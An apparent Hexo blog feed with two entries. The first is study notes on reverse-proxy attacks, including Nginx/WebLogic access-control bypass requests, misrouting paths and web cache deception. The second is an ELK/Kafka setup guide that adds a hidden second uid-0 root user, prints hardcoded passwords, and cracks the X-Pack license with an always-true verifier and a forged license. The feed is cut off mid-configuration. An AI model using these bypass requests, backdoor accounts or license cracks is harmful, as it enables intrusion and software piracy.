<?xml version="1.0" encoding="utf-8"?>
<feed xmlns="http://www.w3.org/2005/Atom">
<title>ru0</title>
<subtitle>Notes from my studies</subtitle>
<link href="/atom.xml" rel="self"/>
<link href="http://ruos.org/"/>
<updated>2020-01-13T08:49:31.095Z</updated>
<id>http://ruos.org/</id>
<author>
<name>ruo</name>
</author>
<generator uri="http://hexo.io/">Hexo</generator>
<entry>
<title>Notes on a-fresh-look-on-reverse-proxy-related-attacks</title>
<link href="http://ruos.org/2020/01/13/a-fresh-look-on-reverse-proxy-related-attacks%E6%80%BB%E7%BB%93/"/>
<id>http://ruos.org/2020/01/13/a-fresh-look-on-reverse-proxy-related-attacks总结/</id>
<published>2020-01-13T03:05:15.000Z</published>
<updated>2020-01-13T08:49:31.095Z</updated>
<content type="html"><![CDATA[<h3 id="前言"><a href="#前言" class="headerlink" title="Preface"></a>Preface</h3><p>I recently studied <a href="https://www.acunetix.com/blog/articles/a-fresh-look-on-reverse-proxy-related-attacks/" target="_blank" rel="external">A Fresh Look On Reverse Proxy Related Attacks</a> in depth; these notes are written up from my own hands-on results.</p>
<h3 id="反向代理如何工作?"><a href="#反向代理如何工作?" class="headerlink" title="How does a reverse proxy work?"></a>How does a reverse proxy work?</h3><p>A reverse proxy receives requests from the Internet and forwards them to servers on the internal network; the user does not notice it is there. Its job consists of receiving a request, processing it, and forwarding it to a backend.</p><p><img src="https://i.imgur.com/hgtrNef.png" alt=""></p>
<h4 id="a-处理请求"><a href="#a-处理请求" class="headerlink" title="a) Request processing"></a>a) Request processing</h4><p>Request processing on the proxy consists of these main steps:</p><ol><li>Parsing</li><li>URL decoding</li><li>Path normalization</li></ol><a id="more"></a>
<p>Many servers support the usual path normalization, for example:</p>
<p>/long/../path/here -> /path/here<br>/long/./path/here -> /long/path/here</p>
<p>But how is a trailing <code>/..</code> handled? In Apache it is equivalent to <code>/../</code>, whereas in Nginx it has no effect at all.</p>
<p>/long/path/here/.. -> /long/path/ - Apache<br>/long/path/here/.. -> /long/path/here/ - Nginx</p>
<blockquote><p>Apache Tomcat behaves like Apache here.</p></blockquote>
<p><code>//</code> is an empty path segment. Nginx collapses it to <code>/</code>, but Apache treats it as a real directory unless it is at the very start of the path.</p>
<p>//long//path//here -> /long/path/here - Nginx<br>//long/path/here -> /long/path/here - Apache<br>/long//path/here -> /long//path/here - Apache</p>
<blockquote><p>Some web servers support odd features of their own: Tomcat and Jetty, for example, accept the special <code>/..;/</code> segment, and also allow traversal with <code>\..\</code>.</p></blockquote>
<p>/long/path/here/..;/ -> /long/path/ - Tomcat</p>
<h4 id="b-应用规则"><a href="#b-应用规则" class="headerlink" title="b) Applying rules"></a>b) Applying rules</h4><p>Forwarding rules are matched on the path.</p><p><a href="http://nginx.org/en/docs/http/ngx_http_core_module.html#location" target="_blank" rel="external">http://nginx.org/en/docs/http/ngx_http_core_module.html#location</a></p>
<h4 id="c-转发到后端"><a href="#c-转发到后端" class="headerlink" title="c) Forwarding to the backend"></a>c) Forwarding to the backend</h4><p>What the backend receives depends on whether the proxy server modifies the request before forwarding it.</p>
<h3 id="案例"><a href="#案例" class="headerlink" title="Cases"></a>Cases</h3><h4 id="Nginx"><a href="#Nginx" class="headerlink" title="Nginx"></a>Nginx</h4><p>With or without a trailing slash</p>
<figure class="highlight plain"><pre><code>location /api/ {
    proxy_pass http://backend_server/;
    #proxy_pass http://backend_server;
}</code></pre></figure>
<p>With a trailing slash<br><a href="http://domain/api/long/" target="_blank" rel="external">http://domain/api/long/</a> -> <a href="http://backend_server/long/" target="_blank" rel="external">http://backend_server/long/</a></p>
<p>Without a trailing slash<br><a href="http://domain/api/long/" target="_blank" rel="external">http://domain/api/long/</a> -> <a href="http://backend_server/api/long/" target="_blank" rel="external">http://backend_server/api/long/</a></p>
<p>References:<br><a href="https://www.leavesongs.com/PENETRATION/nginx-insecure-configuration.html" target="_blank" rel="external">https://www.leavesongs.com/PENETRATION/nginx-insecure-configuration.html</a><br><a href="https://www.jianshu.com/p/c751250a5112" target="_blank" rel="external">https://www.jianshu.com/p/c751250a5112</a></p>
<h4 id="Haproxy"><a href="#Haproxy" class="headerlink" title="Haproxy"></a>Haproxy</h4><p>Haproxy is normally used as a load balancer and does very little request processing: it does not URL-decode, does not normalize the path, and does not even support absolute URLs.</p>
<h3 id="服务端攻击"><a href="#服务端攻击" class="headerlink" title="Server-side attacks"></a>Server-side attacks</h3><h4 id="绕过限制"><a href="#绕过限制" class="headerlink" title="Bypassing restrictions"></a>Bypassing restrictions</h4><p>This is the case where an attacker wants to reach restricted functionality.</p><p>Example 1.</p><p>Nginx is the reverse proxy and WebLogic the backend server. Nginx restricts the admin console by denying every path that starts with <code>/console/</code>.</p>
<figure class="highlight plain"><pre><code>location /console/ {
    deny all;
    return 403;
}

location / {
    proxy_pass http://weblogic;
}</code></pre></figure>
<p>There is no trailing slash after proxy_pass here, so the request is forwarded to the backend without being rewritten. However, Nginx discards everything after <code>#</code>, while WebLogic treats <code>#</code> as an ordinary character. An attacker can therefore reach the admin interface with the following request.</p><p><code>GET /#/../console/ HTTP/1.1</code></p><p>Example: reaching the WebLogic console<br><code>GET /#/../console/login/LoginForm.jsp HTTP/1.1</code></p>
<h4 id="请求路由错误"><a href="#请求路由错误" class="headerlink" title="Request misrouting"></a>Request misrouting</h4><h5 id="例1"><a href="#例1" class="headerlink" title="Example 1"></a>Example 1</h5>
<figure class="highlight plain"><pre><code>location /to_app {
    proxy_pass http://weblogic;
}</code></pre></figure>
<p>With this configuration the proxy forwards to a single WebLogic backend (<a href="http://weblogic/to_app" target="_blank" rel="external">http://weblogic/to_app</a>), so only requests that reach Nginx under /to_app are forwarded to the same path on WebLogic.</p><p>To reach other directories we need to know two things:</p><ol><li>the proxy_pass backend has no trailing slash</li><li>WebLogic supports path parameters (<a href="https://tools.ietf.org/html/rfc3986#section-3.3" target="_blank" rel="external">https://tools.ietf.org/html/rfc3986#section-3.3</a>)</li></ol><blockquote><p>Unlike Tomcat's <code>/..;/..;/</code> traversal, WebLogic treats everything after the first <code>;</code> as a path parameter.</p></blockquote><p>An attacker can reach any directory with the following request.</p>
<figure class="highlight plain"><pre><code>GET /any_path_on_weblogic;/../to_app HTTP/1.1</code></pre></figure>
<p>Nginx receives this request, matches the <code>/to_app</code> rule, and forwards <code>/any_path_on_weblogic;/../to_app</code> to the backend. Because of the behaviour described above, WebLogic believes only <code>/any_path_on_weblogic</code> is being requested; further /../ segments can be added after the <code>;</code> to traverse deeper.</p><p>Example: reaching /wls-wsat/CoordinatorPortType<br><code>GET /wls-wsat/CoordinatorPortType;/../../to_app HTTP/1.1</code></p><p>Example: reaching a backend .jsp when Nginx only forwards requests ending in .do</p><p><code>GET /bea_wls_internal/.shell.jsp;/../../xx.do HTTP/1.1</code></p>
<h5 id="例2"><a href="#例2" class="headerlink" title="Example 2"></a>Example 2</h5><p>This is said to be a bug that will not be fixed; it was hard to translate.</p>
<p>When the proxy rule is <code>location /to_app</code>, the paths <code>/to_app</code>, <code>/to_app/</code> and <code>/to_app_anything</code> (special characters included) all match it, and whatever follows the <code>/to_app</code> prefix is appended to the proxy_pass value.</p>
<figure class="highlight plain"><pre><code>location /to_app {
    proxy_pass http://server/any_path/;
}</code></pre></figure>
<p>With this configuration, a request for <code>/to_app_anything</code> is forwarded to the backend as <code>http://server/any_path/_anything</code>.<br>Combining these behaviours, an attacker can reach almost any path on the backend as follows.</p>
<figure class="highlight plain"><pre><code>GET /to_app../other_path HTTP/1.1 -> http://server/any_path/../other_path</code></pre></figure>
<p>Example: reaching the WebLogic console on the backend<br><code>GET /to_app1../console/login/LoginForm.jsp HTTP/1.1</code></p>
<h5 id="例3"><a href="#例3" class="headerlink" title="Example 3"></a>Example 3</h5><p>In some setups the reverse proxy routes requests to different backends based on the Host header. Taking Haproxy as an example, since it cannot handle absolute URIs, any backend host can be reached as follows.</p>
<figure class="highlight plain"><pre><code>GET http://unsafe-value/path/ HTTP/1.1
Host: example1.com</code></pre></figure>
<p>In most cases (Nginx, Haproxy, Varnish) this does not work, but Apache does allow it in certain versions and configurations. Since that vulnerability (CVE-2011-3368) is very old we do not go into it further; the following links are given for reference.</p><p><a href="https://www.exploit-db.com/exploits/17969" target="_blank" rel="external">https://www.exploit-db.com/exploits/17969</a><br><a href="https://www.contextis.com/de/blog/server-technologies-reverse-proxy-bypass" target="_blank" rel="external">https://www.contextis.com/de/blog/server-technologies-reverse-proxy-bypass</a><br><a href="https://i.blackhat.com/us-18/Wed-August-8/us-18-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out-2.pdf" target="_blank" rel="external">https://i.blackhat.com/us-18/Wed-August-8/us-18-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out-2.pdf</a></p>
<h3 id="客户端攻击"><a href="#客户端攻击" class="headerlink" title="Client-side attacks"></a>Client-side attacks</h3><h4 id="Web缓存欺骗-Web-Cache-Deception"><a href="#Web缓存欺骗-Web-Cache-Deception" class="headerlink" title="Web Cache Deception"></a>Web Cache Deception</h4>
<figure class="highlight plain"><pre><code># Nginx cache configuration
proxy_cache_path /temp levels=1:2 keys_zone=my_cache:10m inactive=120s;
location ~ .*\.(gif|jpg|png|css|js)(.*) {
    proxy_cache my_cache;
    proxy_pass http://30.3.228.163:7041;
    proxy_cache_valid 200 302 60m;
    proxy_set_header X-Real-IP $remote_addr;
    proxy_ignore_headers Cache-Control Expires Set-Cookie;
    add_header Nginx-Cache "$upstream_cache_status";
}</code></pre></figure>
<p>With this configuration Nginx caches the content of any URL with one of the listed extensions. A request for a URL such as <code>/home.php/nonexistent.css</code> returns the same content as <code>/home.php</code>, and Nginx caches that page; an attacker can then obtain the user's sensitive information by requesting <code>/home.php/nonexistent.css</code>.</p><p>References<br><a href="https://www.blackhat.com/docs/us-17/wednesday/us-17-Gil-Web-Cache-Deception-Attack-wp.pdf" target="_blank" rel="external">https://www.blackhat.com/docs/us-17/wednesday/us-17-Gil-Web-Cache-Deception-Attack-wp.pdf</a><br><a href="http://omergil.blogspot.ru/2017/02/web-cache-deception-attack.html" target="_blank" rel="external">http://omergil.blogspot.ru/2017/02/web-cache-deception-attack.html</a></p>
<h4 id="Web缓存中毒-Practical-Web-Cache-Poisoning"><a href="#Web缓存中毒-Practical-Web-Cache-Poisoning" class="headerlink" title="Practical Web Cache Poisoning"></a>Practical Web Cache Poisoning</h4><p>Add an X-Forwarded-Host (XFH) header and check whether it is reflected in the response.</p><blockquote><p>A reverse proxy (load balancer, CDN, etc.) may have a different hostname or port from the origin server that handles the request; X-Forwarded-Host identifies the hostname that was originally used to access it.</p></blockquote><p><a href="https://i.blackhat.com/us-18/Thu-August-9/us-18-Kettle-Practical-Web-Cache-Poisoning-Redefining-Unexploitable.pdf" target="_blank" rel="external">https://i.blackhat.com/us-18/Thu-August-9/us-18-Kettle-Practical-Web-Cache-Poisoning-Redefining-Unexploitable.pdf</a></p>
<h5 id="HTTP响应拆分(CRLF注入)"><a href="#HTTP响应拆分(CRLF注入)" class="headerlink" title="HTTP response splitting (CRLF injection)"></a>HTTP response splitting (CRLF injection)</h5>
<table><thead><tr><th>Abbreviation</th><th>Name</th><th>Escape</th><th>URL-encoded</th></tr></thead><tbody><tr><td>CR</td><td>carriage return</td><td>\r</td><td>%0d</td></tr><tr><td>LF</td><td>line feed</td><td>\n</td><td>%0a</td></tr></tbody></table>
<p>The browser uses \r\n to separate the HTTP headers from the body; once we control characters in a response header we can change how the browser parses the response and so carry out malicious actions.</p>
<h5 id="请求走私-HTTP-Request-Smuggler"><a href="#请求走私-HTTP-Request-Smuggler" class="headerlink" title="HTTP Request Smuggling"></a>HTTP Request Smuggling</h5><p><a href="https://paper.seebug.org/1048/?from=timeline&isappinstalled=0" target="_blank" rel="external">https://paper.seebug.org/1048/?from=timeline&isappinstalled=0</a></p>]]></content>
<summary type="html">
<h3 id="前言"><a href="#前言" class="headerlink" title="Preface"></a>Preface</h3><p>I recently studied <a href="https://www.acunetix.com/blog/articles/a-fresh-look-on-reverse-proxy-related-attacks/" target="_blank" rel="external">A Fresh Look On Reverse Proxy Related Attacks</a> in depth; these notes are written up from my own hands-on results.</p>
<h3 id="反向代理如何工作?"><a href="#反向代理如何工作?" class="headerlink" title="How does a reverse proxy work?"></a>How does a reverse proxy work?</h3><p>A reverse proxy receives requests from the Internet and forwards them to servers on the internal network; the user does not notice it is there. Its job consists of receiving a request, processing it, and forwarding it to a backend.</p>
<p><img src="https://i.imgur.com/hgtrNef.png" alt=""/></p>
<h4 id="a-处理请求"><a href="#a-处理请求" class="headerlink" title="a) Request processing"></a>a) Request processing</h4><p>Request processing on the proxy consists of these main steps:</p>
<ol>
<li>Parsing</li>
<li>URL decoding</li>
<li>Path normalization</li>
</ol>
</summary>
</entry>
<entry>
<title>ELK</title>
<link href="http://ruos.org/2019/03/19/ELK/"/>
<id>http://ruos.org/2019/03/19/ELK/</id>
<published>2019-03-19T02:01:30.000Z</published>
<updated>2019-08-09T06:02:19.248Z</updated>
<content type="html"><![CDATA[<h2 id="指南"><a href="#指南" class="headerlink" title="Guide"></a>Guide</h2><p><a href="https://elkguide.elasticsearch.cn/logstash/get-start/install.html" target="_blank" rel="external">https://elkguide.elasticsearch.cn/logstash/get-start/install.html</a></p>
<h2 id="架构"><a href="#架构" class="headerlink" title="Architecture"></a>Architecture</h2><p>Elasticsearch: real-time full-text search and analytics engine<br>Logstash: log collection, parsing and filtering<br>Kibana: graphical presentation of the data</p><p><img src="http://static.open-open.com/news/uploadImg/20150716/20150716205233_183.png" alt=""></p><p>Server (producer) Beats -> Zookeeper Kafka topic -> (ELK clusters split by business function) Logstash (consumer) -> ES -> Kibana (sensitive information leaking through logs)</p><p>Servers<br>/etc/hosts</p>
<figure class="highlight plain"><pre><code>30.3.229.120 develk01
30.3.229.121 develk02
30.3.229.122 develk03
30.3.229.123 devkafka01
30.3.229.124 devkafka02
30.3.229.125 devkafka03</code></pre></figure>
<p>Add a root-equivalent user (uid 0)</p>
<figure class="highlight plain"><pre><code>useradd -u 0 -o -g root -G root -d /root/ user1
echo "user1":"passw0rD" | chpasswd</code></pre></figure><a id="more"></a>
<h2 id="安装"><a href="#安装" class="headerlink" title="Installation"></a>Installation</h2><p>Upgrade Java to 1.8</p><p>Remove the old Java version and the old Logstash package</p>
<figure class="highlight plain"><pre><code>rpm -qa | grep jdk
yum -y remove jdk-1.7.0_79-fcs.x86_64
yum -y list java*
yum -y install java-1.8.0-openjdk.x86_64
rpm -i jdk-8u171-linux-x64.rpm
rpm -qa | grep logstash
rpm -e --nodeps logstash-5.6.10-1.noarch</code></pre></figure>
<p>Version selection</p><p>Beats<br>Elasticsearch<br>Elasticsearch Hadoop<br>Kibana<br>Logstash<br>X-Pack</p>
<h3 id="Elasticsearch"><a href="#Elasticsearch" class="headerlink" title="Elasticsearch"></a>Elasticsearch</h3><p>/etc/elasticsearch/elasticsearch.yml # Elasticsearch configuration file<br>/etc/elasticsearch/jvm.options # JVM settings such as heap size<br>/etc/elasticsearch/log4j2.properties # logging configuration<br>/var/lib/elasticsearch # default data location</p><p>Cluster configuration</p><p>/etc/elasticsearch/elasticsearch.yml</p>
<figure class="highlight plain"><pre><code>cluster.name: elk-cluster
node.name: ${HOSTNAME}
#node.master: true
#node.data: true
network.host: 0.0.0.0
http.port: 9200
path.data: /data/els/data
path.logs: /data/els/logs
bootstrap.memory_lock: false
bootstrap.system_call_filter: false
discovery.zen.ping.unicast.hosts: ["develk01", "develk02", "develk03"]
discovery.zen.minimum_master_nodes: 2</code></pre></figure>
<p>/etc/security/limits.conf</p>
<figure class="highlight plain"><pre><code>* soft nofile 65536
* hard nofile 65536</code></pre></figure>
<p>Startup errors</p><p>Java HotSpot(TM) 64-Bit Server VM warning: INFO: os::commit_memory(0x0000000085330000, 2060255232, 0) failed; error='Cannot allocate memory' (errno=12)</p><p>/etc/elasticsearch/jvm.options</p><p>-Xms512m<br>-Xmx512m</p>
<p>[2]: max number of threads [1832] for user [elasticsearch] is too low, increase to at least [2048]</p><p>ulimit -u 2048</p>
<p>Create the data directories</p>
<figure class="highlight plain"><pre><code>rm -rf /data/
mkdir -p /data/els/{logs,data}
chown -R elasticsearch.elasticsearch /data/*
service elasticsearch start
# or
bin/elasticsearch -d</code></pre></figure>
<p>View the nodes</p><p><a href="http://30.3.229.120:9200/_cat/nodes?pretty" target="_blank" rel="external">http://30.3.229.120:9200/_cat/nodes?pretty</a></p>
<h4 id="常用操作"><a href="#常用操作" class="headerlink" title="Common operations"></a>Common operations</h4><p>List indices<br><code>curl http://localhost:9200/_cat/indices?v</code></p><p>Delete an index<br><code>curl -u elastic:changeme -XDELETE http://localhost:9200/my_index</code></p><p>/_cat/health?v<br>/_cat/nodes?v</p><p>Install x-pack<br><code>bin/elasticsearch-plugin install x-pack</code></p><p>Change the default x-pack password<br><code>curl -XPUT -u elastic 'localhost:9200/_xpack/security/user/elastic/_password' -d '{"password" : "dfh*&(dUJ"}'</code></p>
<h4 id="elasticsearch-head-监控"><a href="#elasticsearch-head-监控" class="headerlink" title="elasticsearch-head monitoring"></a>elasticsearch-head monitoring</h4>
<figure class="highlight plain"><pre><code>yum install nodejs
yum install npm
npm install -g grunt-cli
git config --global https.proxy http://127.0.0.1:1080
git clone git://github.com/mobz/elasticsearch-head.git
cd elasticsearch-head
npm config set strict-ssl false
npm config set registry https://registry.npm.taobao.org
npm config set proxy http://127.0.0.1:1080
npm info express
npm install
grunt server</code></pre></figure>
<p>Run in the background<br><code>nohup grunt server &</code></p><p><a href="http://localhost:9100" target="_blank" rel="external">http://localhost:9100</a></p>
<h3 id="Logstash"><a href="#Logstash" class="headerlink" title="Logstash"></a>Logstash</h3>
<figure class="highlight plain"><pre><code>[logstash-5.x]
name=Elastic repository for 5.x packages
baseurl=https://artifacts.elastic.co/packages/5.x/yum
gpgcheck=1
gpgkey=https://artifacts.elastic.co/GPG-KEY-elasticsearch
enabled=1
autorefresh=1
type=rpm-md</code></pre></figure>
<p>/etc/logstash/conf.d/elk.conf</p><p>input -> filter -> output</p>
<figure class="highlight plain"><pre><code>input {
  syslog {
    syslog_field => "syslog" # default message
    port => 514
  }
  beats {
    port => 5044
  }
}
filter {
}
output {
  elasticsearch {
    hosts => ["192.168.200.109:9200"]
    index => "test-%{+YYYY.MM}"
  }
}</code></pre></figure>
<p>Start logstash<br><code>nohup bin/logstash --debug --path.settings /etc/logstash/ -f config/test.conf > ls.log 2>&1 &</code><br>Multiple instances<br><code>bin/logstash -f config/syslog.conf --path.data=/tmp</code></p><p><a href="https://www.elastic.co/guide/en/logstash/5.6/config-examples.html" target="_blank" rel="external">https://www.elastic.co/guide/en/logstash/5.6/config-examples.html</a></p>
<p>Writing to kafka</p>
<figure class="highlight plain"><pre><code>input {
  stdin{}
}
output {
  kafka {
    topic_id => "test"
    codec => plain {
      format => "%{message}"
      charset => "UTF-8"
    }
    bootstrap_servers => "192.168.6.22:9092"
  }
  stdout{
    codec => rubydebug
  }
}</code></pre></figure>
<p>Reading from kafka<br>Unlike older versions, 5.0 and later connect to the kafka broker addresses rather than to zk.</p>
<figure class="highlight plain"><pre><code>input{
  kafka{
    bootstrap_servers => ["192.168.6.22:9092"]
    #client_id => "test"
    group_id => "test"
    auto_offset_reset => "latest"
    consumer_threads => 5
    decorate_events => true
    topics => ["test"]
  }
}
output{
  elasticsearch {
    hosts => ["127.0.0.1:9200"]
    index => "test-%{+YYYY.MM}"
    user => 'elastic'
    password => 'changeme'
  }
  stdout{
    codec => rubydebug
  }
}</code></pre></figure>
<p>Multiple processes</p><p><code>bin/logstash -f config/rsyslog.conf --path.data=/tmp</code></p><p>Install x-pack monitoring<br><code>logstash-plugin install file:///tmp/x-pack-5.6.10.zip</code></p><p>nano config/logstash.yml</p>
<figure class="highlight plain"><pre><code>xpack.monitoring.elasticsearch.url: ["http://10.2.0.27:9200"]
xpack.monitoring.elasticsearch.username: "elastic"
xpack.monitoring.elasticsearch.password: "dfh*&(dUJ"
xpack.monitoring.enabled: true
xpack.monitoring.collection.interval: 10s</code></pre></figure>
<h3 id="Kafka"><a href="#Kafka" class="headerlink" title="Kafka"></a>Kafka</h3><p>Topic<br>Kafka sorts message feeds into categories; each category of messages is called a topic.<br>Producer<br>The object that publishes messages is called a topic producer.<br>Consumer<br>The object that subscribes to the feed and processes the published messages is called a consumer.<br>Broker<br>Published messages are stored on a group of servers called the Kafka cluster. Each server in the cluster is a broker. Consumers subscribe to one or more topics and pull data from the brokers to consume the published messages.</p>
<p>Because the broker splits each topic into partitions, ordering is guaranteed within a partition but not across partitions. Consumers can therefore choose their own read position, the offset, per partition.</p>
<p>Compatibility<br>With logstash 5.x, use kafka 0.10.0.x</p>
<figure class="highlight plain"><pre><code># |==========================================================
# |Kafka Client Version |Logstash Version |Plugin Version |Why?
# |0.8 |2.0.0 - 2.x.x |<3.0.0 |Legacy, 0.8 is still popular
# |0.9 |2.0.0 - 2.3.x | 3.x.x |Works with the old Ruby Event API (`event['product']['price'] = 10`)
# |0.9 |2.4.x - 5.x.x | 4.x.x |Works with the new getter/setter APIs (`event.set('[product][price]', 10)`)
# |0.10.0.x |2.4.x - 5.x.x | 5.x.x |Not compatible with the <= 0.9 broker
# |==========================================================</code></pre></figure>
<p>wget <a href="http://mirrors.hust.edu.cn/apache/kafka/0.11.0.2/kafka-0.11.0.2-src.tgz" target="_blank" rel="external">http://mirrors.hust.edu.cn/apache/kafka/0.11.0.2/kafka-0.11.0.2-src.tgz</a></p>
<p>Configure server.properties</p>
<figure class="highlight plain"><pre><code>broker.id=0
listeners=PLAINTEXT://kafka01:9092
advertised.listeners=PLAINTEXT://kafka01:9092</code></pre></figure>
<p>Adjust the JVM heap size in the start script<br><code>export KAFKA_HEAP_OPTS="-Xmx512M -Xms256M"</code></p>
<p>Start the services<br><code>nohup bin/zookeeper-server-start.sh config/zookeeper.properties > zk.out 2>&1 &</code><br><code>nohup bin/kafka-server-start.sh config/server.properties > kafka.out 2>&1 &</code></p><p><code>bin/kafka-server-start.sh -daemon config/server.properties</code></p>
<p>Create a topic automatically<br><code>bin/kafka-console-producer.sh --broker-list localhost:9092 --topic test</code></p>
<p>List existing topics<br><code>bin/kafka-topics.sh --list --zookeeper localhost:2181</code></p>
<p>Show details of the test topic<br><code>bin/kafka-topics.sh --describe --zookeeper localhost:2181 --topic test</code></p>
<p>Delete a topic</p>
<figure class="highlight plain"><pre><code>bin/kafka-topics.sh --delete --zookeeper localhost:2181 --topic test # marks the topic for deletion
bin/zookeeper-shell.sh localhost:2181 # delete it in zk
ls /brokers/topics
rmr /brokers/topics/test</code></pre></figure>
<blockquote><p>Alternatively set delete.topic.enable=true in server.properties</p></blockquote>
<p>Testing</p><p>Producer<br><code>bin/kafka-console-producer.sh --broker-list localhost:9092 --topic test</code></p><p>Consumer<br><code>bin/kafka-console-consumer.sh --zookeeper localhost:2181 --topic test --from-beginning</code></p><blockquote><p>The producer and consumer machines must have the kafka hostnames in their hosts file</p></blockquote>
<h4 id="集群"><a href="#集群" class="headerlink" title="Cluster"></a>Cluster</h4><p>zookeeper.properties</p>
<figure class="highlight plain"><pre><code>initLimit=10
syncLimit=5
dataDir=/tmp/zookeeper
clientPort=2181
maxClientCnxns=0
server.0=kafka:2888:3888
server.1=kafka01:2889:3889
server.2=kafka02:2890:3890</code></pre></figure>
<p>Set each node's own id in its dataDir<br><code>mkdir -p /tmp/zookeeper/log && echo [server.id] > /tmp/zookeeper/myid</code></p>
<p>server.properties</p>
<figure class="highlight plain"><pre><code># use a different broker.id on each broker
broker.id=0
listeners=PLAINTEXT://kafka:9092
advertised.listeners=PLAINTEXT://kafka:9092
zookeeper.connect=kafka:2181,kafka01:2181,kafka02:2181</code></pre></figure>
<p>Testing</p><p>Create a topic, write messages through any broker, and read them back from any broker.</p>
<p>Create the topic<br><code>bin/kafka-topics.sh --create --zookeeper devkafka01:2181,devkafka02:2181,devkafka03:2181 --replication-factor 3 --partitions 3 --topic mytopic</code></p>
<p>List topics<br><code>bin/kafka-topics.sh --list --zookeeper localhost:2181</code></p>
<p>Describe the topic<br><code>bin/kafka-topics.sh --describe --zookeeper devkafka01:2181 --topic mytopic</code></p>
<p>Start a producer<br><code>bin/kafka-console-producer.sh --broker-list devkafka01:9092,devkafka02:9092,devkafka03:9092 --topic mytopic</code></p>
<p>Start a consumer<br><code>bin/kafka-console-consumer.sh --zookeeper devkafka01:2181,devkafka02:2181,devkafka03:2181 --from-beginning --topic mytopic</code></p>
<h4 id="监控"><a href="#监控" class="headerlink" title="Monitoring"></a>Monitoring</h4>
<figure class="highlight plain"><pre><code>#!/bin/bash
java -cp KafkaOffsetMonitor-assembly-0.3.0-SNAPSHOT.jar \
com.quantifind.kafka.offsetapp.OffsetGetterWeb \
--offsetStorage kafka \
--zk devkafka01,devkafka02,devkafka03 \
--port 8080 \
--refresh 10.seconds \
--retain 1.days</code></pre></figure>
<p><code>nohup ./kom.sh > /dev/null 2>&1 &</code></p>
<h4 id="压力测试"><a href="#压力测试" class="headerlink" title="Load testing"></a>Load testing</h4>
<h3 id="Kibana"><a href="#Kibana" class="headerlink" title="Kibana"></a>Kibana</h3><p>/etc/kibana/kibana.yml</p>
<figure class="highlight plain"><pre><code>server.port: 5601 # kibana listening port
server.host: "0.0.0.0" # listening ip
elasticsearch.url: "http://127.0.0.1:9200" # es master node
elasticsearch.username: "elastic"
elasticsearch.password: "changeme"</code></pre></figure>
<p>Offline x-pack installation</p><p><code>bin/kibana-plugin install file:///tmp/x-pack-5.6.10.zip</code></p><p><code>service kibana start</code><br>or<br><code>nohup bin/kibana &</code></p>
<h3 id="图表"><a href="#图表" class="headerlink" title="Charts"></a>Charts</h3><p>Pie chart of alert types<br>Bar chart of attack source addresses<br>URLs accessed</p>
<h3 id="Grafana"><a href="#Grafana" class="headerlink" title="Grafana"></a>Grafana</h3><h3 id="Beats"><a href="#Beats" class="headerlink" title="Beats"></a>Beats</h3><p>Winlogbeat 5.6.10</p><p>Configuration<br>winlogbeat.yml</p>
<figure class="highlight plain"><pre><code># Only one output may be enabled at a time; comment out the one not in use.
#----------------------------- Logstash output --------------------------------
output.logstash:
  # The Logstash hosts
  hosts: ["192.168.200.109:5044"]

#--------------------------kafka-----------------------------------
#output.kafka:
  # initial brokers for reading cluster metadata
  #hosts: ["192.168.6.22:9092"]
  #topic: "test"</code></pre></figure>
<p>Logstash</p>
<figure class="highlight plain"><pre><code>input {
  beats {
    port => 5044
  }
}</code></pre></figure>
<p>Check the configuration<br><code>.\winlogbeat.exe -c .\winlogbeat.yml -configtest -e</code></p><p>Install<br><code>PS C:\winlogbeat-5.6.10-windows-x86_64> .\install-service-winlogbeat.ps1</code><br>Start the service<br><code>net start winlogbeat</code></p>
<h3 id="Flume"><a href="#Flume" class="headerlink" title="Flume"></a>Flume</h3><h3 id="X-Pack"><a href="#X-Pack" class="headerlink" title="X-Pack"></a>X-Pack</h3><p>Default credentials<br>username: elastic<br>password: changeme</p><p>Cracking the license</p><p>LicenseVerifier.java<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div
class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div></pre></td><td class="code"><pre><div class="line">package org.elasticsearch.license;</div><div class="line"></div><div class="line">import java.nio.*;</div><div class="line">import java.util.*;</div><div class="line">import java.security.*;</div><div class="line">import org.elasticsearch.common.xcontent.*;</div><div class="line">import org.apache.lucene.util.*;</div><div class="line">import org.elasticsearch.common.io.*;</div><div class="line">import java.io.*;</div><div class="line"></div><div class="line">public class LicenseVerifier</div><div class="line">{</div><div class="line"> public static boolean verifyLicense(final License license, final byte[] encryptedPublicKeyData) {</div><div class="line"> return true;</div><div class="line"> }</div><div class="line"></div><div class="line"> public static boolean verifyLicense(final License license) {</div><div class="line"> return true;</div><div class="line"> }</div><div class="line">}</div></pre></td></tr></table></figure></p><p><code>javac -cp "/usr/share/elasticsearch/lib/elasticsearch-5.6.10.jar:/usr/share/elasticsearch/lib/lucene-core-6.6.1.jar:/usr/share/elasticsearch/plugins/x-pack/x-pack-5.6.10.jar" LicenseVerifier.java</code></p><p>注册新的license<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">{"license":{"uid":"d3cbbbee-9155-4e1a-a5ed-a7e8940d6564","type":"platinum","issue_date_in_millis":1499299200000,"expiry_date_in_millis":2524579200999,"max_nodes":1000,"issued_to":"guo dalu (eastmoney)","issuer":"Web 
Form","signature":"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","start_date_in_millis":1499299200000}}</div></pre></td></tr></table></figure></p><p><code>curl -XPUT -u elastic:changeme 'http://30.3.229.120:9200/_xpack/license?acknowledge=true' -d @l.json</code><br><code>curl -XGET -u elastic:changeme 'http://30.3.229.120:9200/_license'</code></p><h4 id="Watcher"><a href="#Watcher" class="headerlink" title="Watcher"></a>Watcher</h4><p>监控含有alert的日志并发送邮件告警</p><p>配置elasticsearch.yml<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div></pre></td><td class="code"><pre><div class="line">xpack.notification.email.account:</div><div class="line"> exchange_account:</div><div class="line"> profile: outlook</div><div class="line"> email_defaults:</div><div 